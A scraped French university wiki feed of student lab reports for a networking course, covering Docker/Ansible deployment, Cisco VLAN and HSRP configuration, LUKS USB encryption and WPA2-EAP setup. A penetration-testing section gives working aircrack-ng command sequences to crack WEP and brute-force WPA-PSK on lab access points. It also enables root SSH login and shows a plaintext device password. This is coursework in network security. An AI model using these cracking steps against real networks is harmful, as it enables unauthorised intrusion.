 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [6. Build Docker image from Dockerfile] ***************************************************************************************************************************&lt;br /&gt;
 changed: [private-6phil]&lt;br /&gt;
 changed: [private-mycoplasma]&lt;br /&gt;
 changed: [private-herpesgenital]&lt;br /&gt;
 changed: [private-chaudepisse]&lt;br /&gt;
 changed: [private-chlamydiae]&lt;br /&gt;
 changed: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [7. Running the container]  ****************************************************************************************************************************************&lt;br /&gt;
 changed: [private-6phil]&lt;br /&gt;
 changed: [private-mycoplasma]&lt;br /&gt;
 changed: [private-blennoragie]&lt;br /&gt;
 changed: [private-herpesgenital]&lt;br /&gt;
 changed: [private-chaudepisse]&lt;br /&gt;
 changed: [private-chlamydiae]&lt;br /&gt;
&lt;br /&gt;
 TASK [8. Check if container is running] ********************************************************************************************************************************&lt;br /&gt;
 changed: [private-6phil]&lt;br /&gt;
 changed: [private-mycoplasma]&lt;br /&gt;
 changed: [private-chlamydiae]&lt;br /&gt;
 changed: [private-blennoragie]&lt;br /&gt;
 changed: [private-herpesgenital]&lt;br /&gt;
 changed: [private-chaudepiss]&lt;br /&gt;
&lt;br /&gt;
 PLAY RECAP *************************************************************************************************************************************************************&lt;br /&gt;
 private-6phil              : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-blennoragie        : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-chaudepisse        : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-chlamydiae         : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-herpesgenital      : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-mycoplasma         : ok=10   changed=3    unreachable=0    failed=0&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52106</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52106"/>
				<updated>2020-01-26T22:24:45Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Playbooks */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
